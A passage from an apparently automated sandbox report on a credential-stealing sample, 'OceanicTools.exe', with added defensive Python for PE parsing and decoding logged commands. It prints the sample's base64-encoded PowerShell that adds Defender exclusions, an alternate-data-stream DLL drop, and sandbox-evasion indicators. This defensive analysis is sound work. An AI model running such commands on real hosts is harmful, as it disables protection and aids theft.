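        raise ValueError("not a PE32+ image")
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    debug_size = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_DEBUG:
        _, debug_size = struct.unpack_from(
            "<II", data, opt + 112 + 8 * IMAGE_DIRECTORY_ENTRY_DEBUG)
    sections = []
    table = opt + size_opt
    for i in range(nsections):
        name, vsize, _vaddr, raw = struct.unpack_from("<8sIII", data, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw})
    return {"image_base": image_base, "dll_characteristics": dll_chars,
            "has_debug_dir": debug_size != 0, "sections": sections}


def static_findings(info, file_size):
    """Apply the same size/base/flag heuristics the report lists, phrased like its
    entries so the two can be compared line by line."""
    out = []
    text = next((s for s in info["sections"] if s["name"] == ".text"), None)
    if text and text["virtual_size"] > ONE_MIB:
        out.append("Virtual size of .text is bigger than 0x100000")
    if info["image_base"] > 0x60000000:
        out.append(f"Image base 0x{info['image_base']:x} > 0x60000000")
    if file_size > 1048576:
        out.append(f"File size {file_size} > 1048576")
    for s in info["sections"]:
        if s["raw_size"] > ONE_MIB:
            out.append(f"Raw size of {s['name']} (0x{s['raw_size']:x}) is bigger than 0x100000")
    flags = [n for bit, n in sorted(DLL_CHARACTERISTICS.items())
             if info["dll_characteristics"] & bit]
    out.append("DllCharacteristics " + ", ".join(flags))
    if info["has_debug_dir"]:
        out.append("data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG")
    for s in info["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            out.append(f"section name: {s['name']}")
    return out


def build_sample_pe():
    """Constructed header-only PE32+ image (no section bodies) carrying the values
    this report gives for OceanicTools.exe. Virtual sizes, section RVAs, the
    .buildid size and the debug directory RVA/size are assumed values."""
    sections = [  # (name, VirtualSize, VirtualAddress, SizeOfRawData)
        (b".text",    0x11a7000, 0x0001000, 0x11a7200),
        (b".rdata",   0x016ef00, 0x11a9000, 0x016f000),
        (b".data",    0x0263700, 0x1318000, 0x0263800),
        (b".buildid", 0x0000035, 0x157c000, 0x0000200),
    ]
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                         # PE32+ with 16 data dirs
    struct.pack_into("<H", opt, 0, 0x20B)                        # Magic
    struct.pack_into("<Q", opt, 24, 0x140000000)                 # ImageBase
    struct.pack_into("<H", opt, 70, 0x8160)                      # DllCharacteristics
    struct.pack_into("<I", opt, 108, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_DEBUG, 0x1318100, 0x1c)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, 0, 0, 0, 0, 0, 0)
                     for n, vs, va, rs in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    for line in static_findings(parse_pe(build_sample_pe()), 23282688):
        print(line)
```

Run against a real sample, `parse_pe(open(path, "rb").read())` replaces the constructed image. Note how little these particular checks prove: a 22 MiB image with a 17 MiB .text, the default 64-bit image base and the standard hardening flags describes most statically linked Go, Rust or C++ binaries just as well; the entries only become interesting alongside the behavioural findings below.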

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd@{# Script module or binary module file associated with this manife
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd@{# Script module or binary module file
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
Source: OceanicTools.exe Static PE information: section name: .buildid
Source: qflwedtkihuzyxlg.exe.0.dr Static PE information: section name: .xdata
Source: qflwedtkihuzyxlg.exe_a.dll.11.dr Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848DFD2A5 pushad ; iretd 5_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848F1752B push ebx; iretd 5_2_00007FF848F1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF848DFD2A5 pushad ; iretd 9_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF848F1752B push ebx; iretd 9_2_00007FF848F1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF848FE19D1 push eax; iretd 9_2_00007FF848FE19F1
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EAAF6 push rsp; retf 11_2_00007FF6350EAAF9
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350ED857 push rax; iretd 11_2_00007FF6350ED858
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350ED857 push rax; iretd 14_2_00007FF6350ED858
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350EAAF6 push rsp; retf 14_2_00007FF6350EAAF9
Source: C:\Users\user\Desktop\OceanicTools.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400740C0 ExitProcess,OpenMutexA,ExitProcess,CreateMutexA,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle, 14_2_00000001400740C0
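The two base64 command lines recorded above decode deterministically, and the "File created" entry with a second colon in the path is the alternate-data-stream drop the signatures call out (listed again under "Hooking and other Techniques"). As an added example, not code from the report or its tooling, the following stdlib-only Python pulls every FromBase64String literal out of such event lines, decodes it, flags Add-MpPreference exclusions, and separately flags file writes whose target is an NTFS alternate data stream. The sample lines are transcribed from this section with the report's link text removed; the regular-expression names and the finding tuples are this example's own.

```python
import base64
import re

# Constructed sample input: four event lines transcribed from this report's
# "Data Obfuscation" section (the report's "Jump to ..." link text removed).
REPORT_LINES = [
    r'''Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"''',
    r'''Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"''',
    r'''Source: C:\Users\user\Desktop\OceanicTools.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe''',
    r'''Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll''',
]

# FromBase64String('<payload>') as it appears inside a logged command line.
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
# Add-MpPreference -ExclusionPath|Process|Extension "<value>" inside the decoded text.
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+"?([^"]+)"?', re.IGNORECASE)
# "File created: <drive>:\<path>:<stream>" -- a second colon after the drive letter
# means the write went to an NTFS alternate data stream rather than a file.
ADS_RE = re.compile(r"File created: ([A-Za-z]:\\[^\s:]+):([^\s:]+)(?=\s|$)")


def decode_embedded_base64(line):
    """Return the decoded UTF-8 text of every FromBase64String('...') literal in a
    command line; None marks a literal that is not valid base64 or UTF-8."""
    decoded = []
    for m in B64_RE.finditer(line):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append(None)
    return decoded


def triage(lines):
    """Walk report event lines and return (kind, detail, value) findings:
    defender_exclusion or decoded_powershell for base64 command lines,
    ads_write for files dropped into an alternate data stream."""
    findings = []
    for line in lines:
        for cmd in decode_embedded_base64(line):
            if cmd is None:
                continue
            m = EXCLUSION_RE.search(cmd)
            if m:
                findings.append(("defender_exclusion", m.group(1).lower(), m.group(2)))
            else:
                findings.append(("decoded_powershell", None, cmd))
        m = ADS_RE.search(line)
        if m:
            findings.append(("ads_write", m.group(2), m.group(1)))
    return findings


if __name__ == "__main__":
    for kind, detail, value in triage(REPORT_LINES):
        print(f"{kind:20} {detail or '':8} {value}")
```

The two literals decode to `Add-MpPreference -ExclusionPath "C:\Users\alfons\foekseyrkkzyooxy"` and `Add-MpPreference -ExclusionPath "C:\Users\alfons\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"`: the sample whitelists its own drop directory and the dropped binary in Microsoft Defender before staging the stealer, which is the behaviour behind the "Found suspicious powershell code" and Sigma entries. Two things to check when reproducing this outside the sandbox: the decoded path names a user profile "alfons" while the plaintext paths in this report show "user", so confirm on a real host whether the exclusion actually covers the directory that gets written; and Defender records every exclusion change as event 5007 in the Microsoft-Windows-Windows Defender/Operational log, which is the cheap detection for this step regardless of how the command line was encoded.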

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 occurrences)
On the BitLocker manifest reads: the powershell.exe processes here run Add-MpPreference, a cmdlet from the Defender module that is not loaded at startup. Resolving an unloaded cmdlet triggers PowerShell's module auto-discovery, which reads the manifests of every module under PSModulePath, BitLocker included. Opening BitLocker.psd1 is therefore most likely a side effect of command discovery rather than evidence that the sample touches BitLocker; check the script-block log (event 4104) for any BitLocker cmdlet before treating it as such.
Source: C:\Users\user\Desktop\OceanicTools.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (105 identical entries across the powershell.exe processes)
NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX), which suppresses the dialog Windows would otherwise show when a file the process needs cannot be found. Runtime start-up code sets it routinely, and it appears here for the benign WMIC and PowerShell hosts as well as the sample, so on its own it is a weak indicator.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: qflwedtkihuzyxlg.exe, 0000000B.00000002.2645724843.00000227C6785000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AUTORUNS.EXE'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6682
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7725
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1955
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Dropped PE file which has not been started: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe API coverage: 8.1 %
Source: C:\Users\user\Desktop\OceanicTools.exe TID: 1672 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 6682 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 Thread sleep count: 3111 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508 Thread sleep count: 7725 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508 Thread sleep count: 1955 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B6740 FindClose,FindFirstFileExW,GetLastError, 14_2_00000001400B6740
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B67F0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 14_2_00000001400B67F0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D00F8 FindFirstFileW, 14_2_00000001400D00F8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007EF60 GetLogicalDriveStringsW, 14_2_000000014007EF60
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D0140 GetSystemInfo, 14_2_00000001400D0140
Source: C:\Users\user\Desktop\OceanicTools.exe Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\migration\wtr\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File opened: D:\sources\replacementmanifests\hwvid-migration-2\
Source: OceanicTools.exe Binary or memory string: VMware
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D96000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2655491718.000001FB10DB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
